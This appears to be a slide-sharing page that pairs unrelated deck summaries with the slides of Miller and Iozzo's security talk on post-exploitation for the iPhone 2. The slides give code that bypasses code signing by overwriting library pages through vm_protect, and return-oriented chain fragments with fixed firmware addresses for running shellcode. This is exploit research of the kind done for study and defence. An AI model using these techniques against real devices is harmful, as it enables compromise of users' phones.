Charlie Miller and Vincenzo Iozzo presented techniques for post-exploitation on the iPhone 2 including:
1. Running arbitrary shellcode by overwriting memory protections and calling vm_protect to mark pages as read/write/executable.
2. Loading an unsigned dynamic library called Meterpreter by mapping it over an existing signed library, patching dyld to ignore code signing, and forcing unloaded of linked libraries.
3. Adding new functionality to Meterpreter, such as a module to vibrate and play a sound on the iPhone, demonstrating how payloads can be extended once loaded into memory.
This presentation was presented at IT Audit & IT Security Meetup #4 at Indonesian Cloud, Jakarta.
The exploit development process was quite challenging and we think that it's worth to share.
For educational purposes only.
The document discusses various techniques for exploiting buffer overflows to bypass data execution prevention (DEP) protections, including return-oriented programming (ROP). It describes using Windows API functions like VirtualAlloc to allocate executable memory and copy shellcode. ROP gadgets can be used to craft the stack and call the API functions with the correct parameters, such as allocating memory at a given address and size and marking it executable. The document provides an example stack layout to call VirtualAlloc and memcpy to allocate and copy shellcode into executable memory to bypass DEP.
Rust LDN 24 7 19 Oxidising the Command LineMatt Provost
The document discusses various techniques for building command line utilities in Rust, including handling broken pipes, reading input byte-by-byte or line-by-line, reading from stdin or files, and handling non-UTF8 arguments. It provides code examples of reading from stdin, handling broken pipes gracefully, and collecting command line arguments as OsStrings to support non-UTF8 values. The document concludes by advertising open jobs at Yelp and providing contact information.
This document describes a simple compiler written in Scheme to compile a minimal functional language to x86 assembly. It discusses the key passes of the compiler including type inference, CPS transformation, closure conversion, generation of a low-level IR, register allocation, and machine code generation. While simple, the compiler demonstrates the major stages of a compiler from parsing and semantic analysis to code optimization and back-end code generation.
TVM uses Verilator and DPI to connect Verilog/Chisel accelerator models written in SystemVerilog/Chisel to Python code. It initializes the hardware model and controls simulation using methods like SimLaunch, SimWait, SimResume. The Python code loads the accelerator module, allocates memory, runs the accelerator by calling driver functions that interface with the DPI to initialize, launch and wait for completion of the accelerator. This allows accelerators developed in Verilog/Chisel to be tested from Python.
This document discusses exploiting heap overflows on Windows XP using vectored exception handling. It begins by explaining how the Windows heap works and how heap overflow vulnerabilities can be used to arbitrarily overwrite memory. It then presents a proof-of-concept C program that triggers a heap overflow and calls an exception handler. By overwriting pointers in the vectored exception handling data structures, execution can be redirected to shellcode placed in the heap buffer. The document provides step-by-step instructions for analyzing the vulnerability in a debugger, calculating offsets, and crafting an exploit to launch calc.exe via the heap overflow.
This document provides VHDL code for implementing various logic gates and basic digital circuits. It includes code for AND, OR, NOT, NAND, NOR, XOR and XNOR gates. It also provides code for half adder, full adder, multiplexer, demultiplexer, decoder, encoder, comparator, BCD to binary converter, JK flip-flop, and an n-bit counter. For each circuit, the VHDL code and a sample waveform output is given. The purpose is to design these basic digital components using VHDL and simulate their behavior.
Implementation of the ZigBee ZCL Reporting Configuration FeaturesSimen Li
This slide presents the implementation of the ZigBee ZCL Reporting Configuration features by taking TI Z-Stack Home 1.2.1 SampleLight project as an example.
The document summarizes the OpenCL runtime API and platform layer. It provides an overview of managing OpenCL objects like command queues and memory objects. It lists functions for querying platforms, devices, creating contexts, partitioning devices, and managing memory objects. It also describes pipe objects which are memory objects storing data organized as a FIFO.
SIMD machines — machines capable of evaluating the same instruction on several elements of data in parallel — are nowadays commonplace and diverse, be it in supercomputers, desktop computers or even mobile ones. Numerous tools and libraries can make use of that technology to speed up their computations, yet it could be argued that there is no library that provides a satisfying minimalistic, high-level and platform-agnostic interface for the C++ developer.
The document provides an overview of the OpenCL runtime API and platform layer. It summarizes key API calls for querying platforms and devices, creating contexts, command queues, memory objects like buffers, and functions for reading, writing and mapping these objects. It also briefly mentions pipes, shared virtual memory, and includes diagrams of the OpenCL architecture and class relationships.
Lecture slides that I used in Advanced Information Security Summer School (AIS3, 2016 & 2018) in Taiwan. https://ais3.org/
台湾の高度セキュリティ人材育成プログラム(AIS3, 2016/2018)の講義で利用した講義資料です。
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...Asuka Nakajima
[Abstract]
When developing a 1-day exploit code, patch diffing (binary diffing) is one of the major techniques to identify the part that security fixes are applied. This technique is well-known since long ago among reverse engineers, and thus to support the diffing, various tools such as BinDiff, TurboDiff, and Diaphora have been developed. However, although those fantastic tools greatly support the analysis, patch diffing is still a difficult task because it requires deep knowledge and experience. In order to address this issue, we conducted a pilot study with the goal to achieve a semi-automated patch diffing by applying machine-learning techniques. Based on the hypothesis that “similar types of vulnerabilities will be fixed in a similar manner,” we have applied the unsupervised machine learning technique to extract those patterns and considered the way to achieve semi-automated patch diffing. In the talk, we will show the details of our pilot study and share the insights that we have gained it. We believe that our insights will help other researchers who will conduct similar research in the future.
The document summarizes the steps taken to analyze and exploit a DEFCON CTF binary file called "annyong". It describes using various Linux commands like file, strings, hexdump, readelf, and checksec to gather information about the binary. The analysis revealed the binary is position independent and has NX, PIE, and partial RELRO protections. The exploit uses return oriented programming (ROP) to execute a system call and spawn an interactive shell, bypassing protections by overwriting return addresses on the stack.
The document describes a homework assignment to simulate an ARM processor and implement stack operations. The program will read instructions from a file, execute them one by one, and print register and stack contents after each instruction. It will implement instructions like ADD, SUB, LOAD, STORE, BRANCH and handle a stack. The output will show the current instruction, register values and the used portion of the stack.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Exploit Development: EzServer Buffer Overflow oleh Tom Gregoryzakiakhmad
EzServer adalah video server yang dapat melakukan stream dengan kualitas full HD ke berbagai mesin. Buffer overflow ditemukan pada aplikasi EzServer yang berjalan pada port 8000. Attacker dapat mengirimkan sejumlah kode berbahaya ke port 8000 dan mendapatkan akses setara dengan hak akses aplikasi EzServer. Pada kesempatan ini, penulis akan memaparkan proses pembuatan exploit terhadap aplikasi EzServer menggunakan Python.
Tom Gregory: Security consultant at Spentera, Metasploit exploit developer/contributor.
http://www.python.or.id/2013/04/kopi-darat-komunitas-python-indonesia.html
This document discusses common C++ bugs and tools to find them. It describes various types of memory access bugs like buffer overflows on the stack, heap, and globals that can lead to crashes or security vulnerabilities. Threading bugs like data races, deadlocks, and race conditions on object destruction are also covered. Other undefined behaviors like initialization order issues, lack of sequence points, and integer overflows are explained. The document provides examples of each type of bug and quizzes the reader to find bugs in a code sample. It recommends resources for further reading on debugging techniques and thread sanitizers that can detect races and data races.
This document provides an overview of x86 assembly language and the GNU Debugger (GDB). It describes the process of creating an executable file from source code using preprocessing, compilation, assembly and linking. It also covers x86 registers, common instructions like MOV, PUSH, CALL and RET. The document introduces Intel and AT&T syntax and system calls. Finally, it outlines basic operations and commands in GDB like breaking, running, examining memory and registers.
This document describes an email encryption project that aims to securely transmit information by protecting email messages from unauthorized access. The project uses encryption algorithms like mono-alphabetic, poly-alphabetic, and binary encryption to authenticate and encrypt emails, securing them from third parties. It has modules for access control, encryption, sending encrypted emails, and decryption. The project's objectives are to provide secure communication, protect data from third parties, and ensure confidentiality of privileged information for employees and clients.
The document compares the iPhone 5 to the iPhone 4, noting differences in size, weight, screen resolution, and processor. It discusses initial positive reactions to the iPhone 5 from reviewers and consumers, particularly praising the lighter weight and thinner design. However, it also notes some criticism of the iPhone 5's lack of near field communication and average battery life.
The document provides an overview of web application security topics like SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), file inclusion, and tools/techniques for exploiting vulnerabilities. It discusses basic web communication, HTTP methods, response codes, URLs, database communication. It also covers setting up a Kali Linux environment, Firefox plugins, exploiting XSS vulnerabilities, defending against attacks, and includes exercises on vulnerable web apps.
Post XSS Exploitation : Advanced Attacks and RemediesAdwiteeya Agrawal
This is the presentation I used at the National Conference on “Current Scenario & Emerging trends in Information Technology" held at MSIT in march 2013.
Here is the link to the whitepaper : http://www.exploit-db.com/wp-content/themes/exploit/docs/24559.pdf
This document discusses hacking games using Cheat Engine by scanning and editing memory values. It describes basic techniques like speed hacking by editing static and dynamic variables. More advanced techniques covered include memory dissection of the player structure containing coordinates, health, and weapons data to allow teleportation, aimbots, or flying. It also discusses code injection and function tracing in Ollydbg to enable complex actions through single variable edits. The document is intended as an introduction to hacking games using Cheat Engine memory scanning and editing.
This document describes a project to develop a model that can slow down software cracking and reversing. It discusses implementing a virtual machine with a customized instruction set and porting encryption and packing routines. The system design includes 7 registers, a stack, and 183 instructions across 11 categories. Implementation details and tests are provided, showing difficulty reversing the obfuscated code. Future work ideas include adding anti-debugging and randomization.
Secure Texting Best Practices: Identify Your GoalsqliqSoft
There are many benefits to secure texting. But what are the main objectives for your organization? What factors are you trying to impact? For most organizations, goals include security compliance, improving communication, and reducing cost or ROI.
303 TANSTAAFL: Using Open Source iPhone UI Codejonmarimba
This document discusses modifications made to improve the animation and behavior of an open source cover flow library called OpenFlow. The author hacked the code to have a scroll view handle animation instead of core animation for better control. Touch handling was also hijacked to directly control selection instead of relying on scroll view callbacks. Friction was reduced and reflection rendering was adjusted to better match Apple's implementation.
This document summarizes the system design of an OIVM processor. The processor uses C++ and has a CLI interface. It consists of processor registers like A, B, C, D for general purposes and SP, IP, FLAG registers. It also has a stack and bootROM for instructions. The bootROM contains instruction codes that are executed by the RUN() function one by one. Key components like registers, stack, and instructions are described in detail.
This document provides summaries of 7 programs coded on a processor. Program 1 adds two numbers, Program 2 implements a while loop to decrement a number until it reaches zero, Program 3 creates an array and displays elements in reverse order, Program 4 encrypts input by adding 5 to each element, Program 5 performs a linear search, Program 6 decrypts an encrypted ROM on the fly, and Program 7 dynamically expands a compressed program on the fly.
This document provides information about Talley INFHDWSWL03 3/8-inch lock washers. It describes how to purchase the product from Launch 3 Telecom, including payment and shipping options. Launch 3 Telecom offers same-day shipping for orders placed before 3PM EST, with order tracking provided. The document also provides details on Launch 3 Telecom's product warranty and repair services.
El documento presenta las ideas de un líder religioso sobre el cristianismo y la Iglesia. Argumenta que el cristianismo es una persona, Jesucristo, no solo un conjunto de creencias. También dice que todos los trabajadores, no solo los sacerdotes, realizan un trabajo sagrado cuando sirven a los demás con honestidad. Finalmente, critica una religión que se enfoca solo en las apariencias y no en la justicia, y una iglesia que busca privilegios en lugar de sufrir por los pobres como hizo Jesús.
Wie gelingt Veränderung, persönlich und im eigenen Umfeld? Hilfreich ist die Analogie zu einer Heldenreise. Welche Phasen wir in einer Entwicklung durchmachen, ist vergleichbar einer Suche nach dem Goldschatz oder dem Versuch, eine Prinzessin zu befreien: jede Menge Unwetter zu überstehen und viele Drachen sind zu töten.
Aber immer wieder trifft der Held auch einen weisen Druiden, der ihm weiterhilft.
Folien und Text einer Präsentation im pecha kucha-Format: 20 Folien in jeweils 20 Sekunden für einen Votrag von 6.40 Minunte. Storytelling ist Thema meiner Trainings. Nach einem Text von Jon Christoph Berndt (siehe Folie 22).
Edition Dirk Hannemann, Berlin
Trainer für Kommunikation und Persönlichkeitsentwicklung und Dozent für Personalanagement.
Homepage hannemann-training.de
The document appears to be a list of random topics and people including: types of comedy, musicians, historical figures, athletes, places, foods, and movies. It covers a wide range of diverse people and topics from around the world throughout history in a seemingly disorganized manner.
Este documento describe los procesos de investigación cualitativa y cuantitativa. Explica que la investigación cuantitativa se centra en aspectos medibles y busca describir características generales de muchos casos, mientras que la investigación cualitativa se enfoca en comprender fenómenos complejos de pocos casos de manera holística. También destaca las diferencias entre los enfoques, como el tamaño de la muestra y el tipo de datos recolectados.
La computadora es un sistema electrónico que procesa datos de acuerdo a instrucciones internas. Está compuesta de hardware (componentes físicos) y software (programas). El hardware incluye la CPU, memoria y dispositivos de entrada/salida. La CPU ejecuta instrucciones en un ciclo repetitivo que incluye la unidad lógica, de control y memoria. Los programas se escriben en lenguajes de programación como lenguajes de máquina, ensamblador o de alto nivel.
Linux has this great tool called strace, on OSX there’s a tool called dtruss - based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one - albeit a simpler version for now. I called it objc_trace.
Beyond Breakpoints: A Tour of Dynamic AnalysisFastly
Despite advances in software design and static analysis techniques, software remains incredibly complicated and difficult to reason about. Understanding highly-concurrent, kernel-level, and intentionally-obfuscated programs are among the problem domains that spawned the field of dynamic program analysis. More than mere debuggers, the challenge of dynamic analysis tools is to be able record, analyze, and replay execution without sacrificing performance. This talk will provide an introduction to the dynamic analysis research space and hopefully inspire you to consider integrating these techniques into your own internal tools.
Shellcode is machine code that executes a shell when run. This document discusses shellcode, including:
- Shellcode injects machine code into a vulnerable application to spawn a shell.
- Three examples of shellcode are provided: an exit system call, displaying a message, and spawning a shell.
- Registers, assembly instructions, and system calls used in Linux are explained for creating shellcode.
The document provides an overview of the C programming language. It states that C was developed in 1972 by Dennis Ritchie at Bell Labs and was used to develop the UNIX operating system. The document then covers various features of C like it being a mid-level programming language, having structured programming, pointers, loops, functions, arrays, and more. It provides examples to explain concepts like input/output functions, data types, operators, control structures, and pointers.
We often need to store private data in programs, for example passwords, secret keys, and their derivatives, and we usually need to clear their traces in the memory after using them so that a potential intruder can't gain access to these data. In this article we will discuss why you can't clear private data using memset() function.
0x01 - Breaking into Linux VMs for Fun and ProfitRussell Sanford
This presentation focuses on an attack technique I developed to utilize OS debugging functionality provided by VMWare to compromise Linux Virtual Machines
Since the emerging of the OpenStack cloud computing platform in the Ubuntu community, increasing number of public/private cloud service providers choose to deploy it all over the world. Recently, Spectre and Meltdown have caused a panic in the world and the Spectre V2 is the only one which can attack the host system from the guest VM. It's vital to know the detailed process of the attack. Gavin Guo will give a detail explanation and an example of how to attack the host system. Besides, v1/v3/v4 are also introduced in the slide.
We all make mistakes while programming and spend a lot of time fixing them.
One of the methods which allows for quick detection of defects is source code static analysis.
We all make mistakes while programming and spend a lot of time fixing them.
One of the methods which allows for quick detection of defects is source code static analysis.
ironSource's security application expert, Tomer Zait, shares his insights on engineering in the stack. Tomer, an Ort Singalovsky alumnus himself, gave this presentation to the Ort Singalovsky students on their tour of ironSource's headquarters in Tel Aviv.
Want to learn more about ironSource? Visit our website: www.ironsrc.com
Follow us on Twitter @ironSource
ironSource is looking for new talent! Check out our openings: http://bit.ly/Work-at-ironSource
This document describes techniques for breaking into Linux virtual machines by exploiting debugging mechanisms. It summarizes an original technique developed in 2016 using VMware's GDB plugs to attach a debugger to Linux VMs and hijack execution to spawn a root shell. The author then refined the technique to more quickly identify the call_usermodehelper API using code cross-reference mapping and deploy shellcodeless exploitation to stealthily execute commands. Multiple methods are provided to identify the call_usermodehelper API, including leveraging the do_coredump function for older kernel versions.
Penetrating Windows 8 with syringe utilityIOSR Journals
This document discusses penetrating Windows 8 remotely using Metasploit framework and syringe utility. It begins with an introduction to penetration testing and Windows 8 security. It then describes using Metasploit to generate a payload, encoding it to evade detection, and injecting it into a Windows 8 system using syringe. This allows establishing a meterpreter session and compromising the system by migrating processes and accessing the C drive. It concludes that Windows 8 has strong security but syringe injections allow compromising it, and more exploits could be found to enhance efficacy.
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
The document discusses penetration testing of the Easy RM to MP3 Converter application. It begins by setting up the testing environment with Backtrack5, Windows SP2 and SP3 virtual machines, and the vulnerable application. It then analyzes the application dynamically using a debugger to find a buffer overflow vulnerability. The document creates an exploit payload that uses return oriented programming (ROP) to bypass data execution prevention (DEP) and execute shellcode to connect back to the attacker machine for post-exploit access.
Kernel Recipes 2019 - ftrace: Where modifying a running kernel all startedAnne Nicolas
The document describes the ftrace function tracing tool in Linux kernels. It allows attaching to functions in the kernel to trace function calls. It works by having the GCC compiler insert indirect function entry calls. These calls are recorded during linking and replaced with nops at boot time for efficiency. This allows function tracing with low overhead by tracing the indirect function entry calls.
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...Marco Balduzzi
Protocol gateways are embedded devices used in industrial facilities to integrate legacy equipment such as serial PLCs with modern control networks. Given the importance that these devices play in the operation of manufacturing plants, we conducted a vendor agnostic analysis of the technology behind protocol translation, by identifying new unexplored weaknesses and vulnerabilities. We evaluated five popular gateway products and discovered translation problems that enable potential adversaries to conduct stealthy and difficult-to-detect attacks, for example to arbitrarily disable, or enable a targeted machinery by mean of innocent-looking packets that bypass common ICS firewalls. In this presentation, we share the results of our findings and discuss the impact to the problems that we identified and their potential countermeasures.
This document discusses mobile security threats and attacker mindsets. It notes that mobile malware primarily impacts Android due to its fragmented ecosystem and slow patching. Exploitation focuses on gaining control of applications or baseband processors, which have few defenses and high-value data. The document advises software vendors to implement stronger mitigations, developers to better isolate sensitive data, and policymakers to recognize diverse mobile threats and segregate devices from corporate networks. It argues that understanding attacker goals and what data needs protection is key to effective security.
The document discusses using static analysis techniques like pointer analysis to detect bugs involving stale pointers. It presents an approach that first converts programs to SSA form and then performs intraprocedural and interprocedural pointer analysis to track pointer aliases and detect when pointers may be used after the memory they point to has been freed or reallocated. The analysis combines dataflow and abstract interpretation to build and propagate pointer alias information within and across functions to find potential stale pointer bugs.
Stale pointers are the new black - white paperVincenzo Iozzo
This document is a thesis from Politecnico di Milano on detecting stale pointers through static analysis. It introduces the topic of static analysis and pointer analysis. The thesis will preprocess binary code into an intermediate representation, then perform intraprocedural and interprocedural pointer analysis to construct alias trees. It will use this information to detect potential stale pointer bugs in the code.
Everybody be cool, this is a ROPpery - White paperVincenzo Iozzo
This document presents algorithms for finding gadgets that can be chained together to perform arbitrary operations without code injection. The algorithms work by first identifying "free branch" instructions in the target binary that allow controlling program flow. It then analyzes paths leading to these instructions to extract gadgets. Gadgets are represented as expression trees to enable platform-independent comparison. The trees capture the operation performed by each gadget. The goal is to find a minimal set of gadgets that are sufficient for Turing-completeness yet convenient to program with.
Return-oriented programming (ROP) allows executing code on systems with non-executable pages by chaining together small "gadgets" from existing code. The document describes algorithms for automatically finding gadgets in binaries and chaining them to form payloads. It also introduces a ROP compiler called "The Wolf" that uses a simple language and the STP theorem prover to generate payloads by satisfying constraints from gadgets. Future work includes supporting more platforms and improving flexibility in the presence of ASLR.
This document proposes an approach to fuzz testing software with no prior knowledge of the input format or binary code. It involves using static analysis metrics like cyclomatic complexity and loop detection to identify functions of interest. Data tainting is then used to track how user input propagates through the binary. In-memory fuzzing mutates input data at locations identified via tainting. This aims to limit human intervention and reduce false positives compared to existing in-memory fuzzing techniques. The approach combines static analysis, data tainting, and in-memory fuzzing in a new way to build an intelligent fuzzer requiring minimal instrumentation.
The document discusses various fuzzing techniques including dumb fuzzing, smart fuzzing, evolutionary fuzzing, using cyclomatic complexity as a filter, detecting implicit loops with dominator trees, performing in-memory fuzzing by mutating memory locations and restoring snapshots, and comparing code coverage of good and mutated samples to determine when halting criteria is met. The speaker hopes to convey an understanding of these ideas through pictures rather than traditional presentation elements. Questions from the audience are also discussed.
Fun and Games with Mac OS X and iPhone Payloads White Paper, Black Hat EU 2009Vincenzo Iozzo
This document introduces advanced payloads that can be used on Mac OS X and iPhone to avoid detection, avoid forensics analysis, and avoid security countermeasures. It describes userland execution techniques that allow injecting binaries into memory on Mac OS X without writing to disk or creating new processes. It also discusses Meterpreter, a post-exploitation payload, and porting it to Mac OS X (called Macterpreter) to provide similar functionality without touching the disk. Finally, it reveals payloads that work against factory iPhones despite memory protections and code signing.
The document discusses an in-memory injection technique for Mac OS X that allows injecting arbitrary binaries into a victim's machine without leaving traces on the hard disk or creating new processes. The technique works by crafting a Mach-O binary with a shellcode that impersonates the kernel and loads the binary, libraries, and dynamic linker into memory to execute code. It also details methods for gathering symbols from libraries to defeat address space layout randomization.
The document discusses techniques for executing arbitrary binaries in memory on a Mac OS X machine. It describes the Mach-O file format and how binaries are executed by the kernel and dynamic linker. An attack technique is proposed that encapsulates a shellcode and crafted stack in the injected binary to impersonate the kernel and load the new binary. It also discusses defeating address space layout randomization on libraries to retrieve needed variables.
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Vincenzo Iozzo
Charlie Miller and Vincenzo Iozzo discuss post-exploitation techniques on Mac OS X and iPhone. They demonstrate userland execution of binaries without the kernel's involvement. Meterpreter, an advanced Metasploit payload, is shown to provide stealthier access and additional functionality compared to a shell. Finally, "Macterpreter" is presented as a port of Meterpreter to Mac OS X targets using in-memory code injection.
Post exploitation techniques on OSX and Iphone, EuSecWest 2009Vincenzo Iozzo
The document discusses post-exploitation techniques on macOS and iOS. It summarizes a technique called "userland-exec" that allows executing binaries on macOS without involving the kernel. It then describes efforts to port this technique to iOS by injecting libraries instead of binaries due to code signing restrictions. The author demonstrates injecting an unsigned library into a process on a factory iPhone by hijacking the dlopen function and loading the library from memory. This technique paves the way for developing advanced payloads like Meterpreter on unmodified iOS devices.
Flame emission spectroscopy is an instrument used to determine concentration of metal ions in sample. Flame provide energy for excitation atoms introduced into flame. It involve components like sample delivery system, burner, sample, mirror, slits, monochromator, filter, detector (photomultiplier tube and photo tube detector). There are many interference involved during analysis of sample like spectral interference, ionisation interference, chemical interference ect. It can be used for both quantitative and qualitative study, determine lead in petrol, determine alkali and alkaline earth metal, determine fertilizer requirement for soil.
TrustArc Webinar - Innovating with TRUSTe Responsible AI CertificationTrustArc
In a landmark year marked by significant AI advancements, it’s vital to prioritize transparency, accountability, and respect for privacy rights with your AI innovation.
Learn how to navigate the shifting AI landscape with our innovative solution TRUSTe Responsible AI Certification, the first AI certification designed for data protection and privacy. Crafted by a team with 10,000+ privacy certifications issued, this framework integrated industry standards and laws for responsible AI governance.
This webinar will review:
- How compliance can play a role in the development and deployment of AI systems
- How to model trust and transparency across products and services
- How to save time and work smarter in understanding regulatory obligations, including AI
- How to operationalize and deploy AI governance best practices in your organization
Increase Quality with User Access Policies - July 2024Peter Caitens
⭐️ Increase Quality with User Access Policies ⭐️, presented by Peter Caitens and Adam Best of Salesforce. View the slides from this session to hear all about “User Access Policies” and how they can help you onboard users faster with greater quality.
Securiport Gambia is a civil aviation and intelligent immigration solutions provider founded in 2001. The company was created to address security needs unique to today’s age of advanced technology and security threats. Securiport Gambia partners with governments, coming alongside their border security to create and implement the right solutions.
Understanding the NFT marketplace ecosystem involves exploring platforms for creating, buying, selling, and trading digital assets. These platforms use blockchain technology for security and smart contracts for automated transactions. Key components include digital wallets, NFT standards, and marketplaces like OpenSea and Rarible. This ecosystem is shaped by the roles of creators, collectors, and developers, offering insights into the dynamics and trends of the digital asset economy.
Webinar: Transforming Substation Automation with Open Source SolutionsDanBrown980551
This webinar will provide an overview of open source software and tooling for digital substation automation in energy systems. The speakers will provide a brief overview of how open source collaborative development works in general, then delve into how it is driving innovation and accelerating the pace of substation automation. Examples of specific open source solutions and real-world implementations by utilities will be discussed. Participants will walk away with a better understanding of the challenges of automating substations, the ecosystem of solutions available to help, and best practices for implementing them.
Discover practical tips and tricks for streamlining your Marketo programs from end to end. Whether you're new to Marketo or looking to enhance your existing processes, our expert speakers will provide insights and strategies you can implement right away.
Selling software today doesn’t look anything like it did a few years ago. Especially software that runs inside a customer environment. Dreamfactory has used Anchore and Ask Sage to achieve compliance in a record time. Reducing attack surface to keep vulnerability counts low, and configuring automation to meet those compliance requirements. After achieving compliance, they are keeping up to date with Anchore Enterprise in their CI/CD pipelines.
The CEO of Ask Sage, Nic Chaillan, the CEO of Dreamfactory Terence Bennet, and Anchore’s VP of Security Josh Bressers are going to discuss these hard problems.
In this webinar we will cover:
- The standards Dreamfactory decided to use for their compliance efforts
- How Dreamfactory used Ask Sage to collect and write up their evidence
- How Dreamfactory used Anchore Enterprise to help achieve their compliance needs
- How Dreamfactory is using automation to stay in compliance continuously
- How reducing attack surface can lower vulnerability findings
- How you can apply these principles in your own environment
When you do security right, they won’t know you’ve done anything at all!
Using ScyllaDB for Real-Time Write-Heavy WorkloadsScyllaDB
Keeping latencies low for highly concurrent, intensive data ingestion
ScyllaDB’s “sweet spot” is workloads over 50K operations per second that require predictably low (e.g., single-digit millisecond) latency. And its unique architecture makes it particularly valuable for the real-time write-heavy workloads such as those commonly found in IoT, logging systems, real-time analytics, and order processing.
Join ScyllaDB technical director Felipe Cardeneti Mendes and principal field engineer, Lubos Kosco to learn about:
- Common challenges that arise with real-time write-heavy workloads
- The tradeoffs teams face and tips for negotiating them
- ScyllaDB architectural elements that support real-time write-heavy workloads
- How your peers are using ScyllaDB with similar workloads
Using ScyllaDB for Real-Time Write-Heavy Workloads
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat USA 2009
1. Post Exploitation Bliss:
Meterpreter for iPhone
Charlie MIller Vincenzo Iozzo
Independent Security Evaluators Zynamics & Secure Network
cmiller@securityevaluators.com vincenzo.iozzo@zynamics.com
2. Who we are
Charlie
First to hack the iPhone, G1 Phone
Pwn2Own winner, 2008, 2009
Author: Mac Hackers Handbook
Vincenzo
Student at Politecnico di Milano
Security Consultant at Secure Network srl
Reverse Engineer at Zynamics GmbH
5. iPhones
Jailbroken: various patches, can access FS, run unsigned
code, etc
Development: click “use for development” in Xcode. Adds
some debugging tools
Provisioned: Can run Apple code or from developer phone
is provisioned for
Factory phones: no modifications at all
Warning: Testing only on first 3
8. iPhone 1 & 2
Version 1: Heap was RWX, easy to run shellcode
Version 2: No RWX pages
On Jailbroken can go from RW -> RX
Not on Development or Provisioned (or Factory) phones
CSW talks assumed jailbroken
9. Some facts about code
signing
On execve() the kernel searches for a segment
LC_CODE_SIGNATURE which contains the signature
If the signature is already present in the kernel it is validated
using SHA-1 hashes and offsets
If the signature is not found it is validated and allocated,
SHA-1 hashes are checked too
Hashes are calculated on the whole page, so we cannot
write malicious code in the slack space
10. What’s the effect of code signing?
When a page is signed the kernel adds a flag to that page
/* mark this vnode's VM object as having "signed pages" */
kr = memory_object_signed(uip->ui_control, TRUE);
11. What if a page is not signed?
We can still map a page (following XN policy) with RX
permissions
Whenever we try to access that page a SIGBUS is raised
If we try to change permissions of a page to enable
execution (using mprotect or vm_protect), the call fails*
12. Why breaking codesigning
breaks memory protections
#if CONFIG_EMBEDDED
if (cur_protection & VM_PROT_WRITE) {
if (cur_protection & VM_PROT_EXECUTE) {
printf("EMBEDDED: %s curprot cannot be write+execute. turning off executen",
__PRETTY_FUNCTION__);
cur_protection &= ~VM_PROT_EXECUTE;
}
}
if (max_protection & VM_PROT_WRITE) {
if (max_protection & VM_PROT_EXECUTE) {
/* Right now all kinds of data segments are RWX. No point in logging that. */
/* printf("EMBEDDED: %s maxprot cannot be write+execute. turning off executen",
__PRETTY_FUNCTION__); */
/* Try to take a hint from curprot. If curprot is not writable,
* make maxprot not writable. Otherwise make it not executable.
*/
if((cur_protection & VM_PROT_WRITE) == 0) {
max_protection &= ~VM_PROT_WRITE;
} else {
max_protection &= ~VM_PROT_EXECUTE; <------ NOP’d by jailbreak
}
}
}
assert ((cur_protection | max_protection) == max_protection);
#endif /* CONFIG_EMBEDDED */
13. Thoughts about getting
shellcode running
Can’t write shellcode to RW and turn to RX
Can’t allocate RX heap page (hoping to have data there)
Can’t change a RX page to RW and back
How the hell do debuggers set software breakpoints?
14. This does work!
void (*f)();
unsigned int addy = 0x31414530; // getchar()
unsigned int ssize = sizeof(shellcode3);
kern_return_t r ;
r = vm_protect( mach_task_self(), (vm_address_t) addy, ssize,
FALSE, VM_PROT_READ |VM_PROT_WRITE | VM_PROT_COPY);
if(r==KERN_SUCCESS){
printf("vm_protect is cooln");
}
memcpy((unsigned int *) addy, shellcode3, sizeof(shellcode3));
f = (void (*)()) addy;
f();
So we can overwrite local copies of libraries with our
shellcode and execute it
16. How to run code?
Can’t write and execute code from unsigned pages
Can’t write to file and exec/dlopen
However, nothing is randomized
So we can use return-to-libc/return-oriented-programming
17. ARM basics
16 32-bit registers, r0-r15
r13 = sp, stack pointer
r14 = lr, link register - stores return address
r15 = pc, program counter
RISC - few instructions, mostly uniform length
Placing a dword in a register usually requires more than 1
instruction
Can switch to Thumb mode (2 or 4 byte instructions)
18. Function calls
Instead of {jmp, call} you get {b, bl, bx, blx}
b (branch) changes execution to offset from pc specified
bl does same but sets lr to next instruction (ret address)
• In particular, ret addy not on stack
bx/blx similar except address is absolute
pc is a general purpose register, i.e. mov pc, r1 works
First 4 arguments passed in r0-r3, rest on the stack
21. Return-to-libc, x86
Reuse executable code already in process
Layout data near ESP such that arguments and return
addresses are used from user supplied data
This is a pain....
Typically, quickly try to call system() or a function to
disable DEP (or mprotect)
22. ARM issues
Function arguments passed in registers, not on stack
Must always find code to load stack values into registers
Can’t “create” instructions by jumping to middle of existing
instructions (unlike x86)
Return address not always stored on stack
23. Payload: Beep and Vibrate
The second ever iPhone payload - v 1.0.0
Replicate what happens when a text message is received:
vibrate and beep
We want to have the following code executed
AudioServicesPlaySystemSound(0x3ea);
exit(0);
24. So I wrote this little program
void foo(unsigned int *shellcode){
char buf[8];
memcpy(buf, shellcode, sizeof(int) * 25);
}
It’s stupid, but serves its purpose
25. Set r0-r3, PC
shellcode1a[0] =0x11112222;
shellcode1a[1] =0x33334444;
shellcode1a[2] =0x12345566; // r7
shellcode1a[3] =0x314e4bec; // PC
0x314e4bec: ldmia sp!, {r0, r1, r2, r3, pc}
All addresses for 2.2.1
28. Progress
By not jumping to the first instruction, lr is not pushed on
the stack
When lr is popped off the stack, it will pop a value we
control
We regain control and call exit at this point
29. Call _exit()
shellcode1a[9] = 0x11112222; // r4
shellcode1a[10] = 0x33324444; // r7
shellcode1a[11] = 0x31463018; // lr
should probably set something in r0...
Debugger stopped.
Program exited with status value:0.
30. Demo!
iPhone 2.2.1
Not jailbroken
Development phone
(would work on 3.0 factory)
31. Payload: Arbitrary shellcode
We craft return-to-libc for the following C code
vm_protect( mach_task_self(), (vm_address_t) addy, size,
FALSE, VM_PROT_READ |VM_PROT_WRITE | VM_PROT_COPY);
memcpy(addy, shellcode, size);
addy()
39. The next step
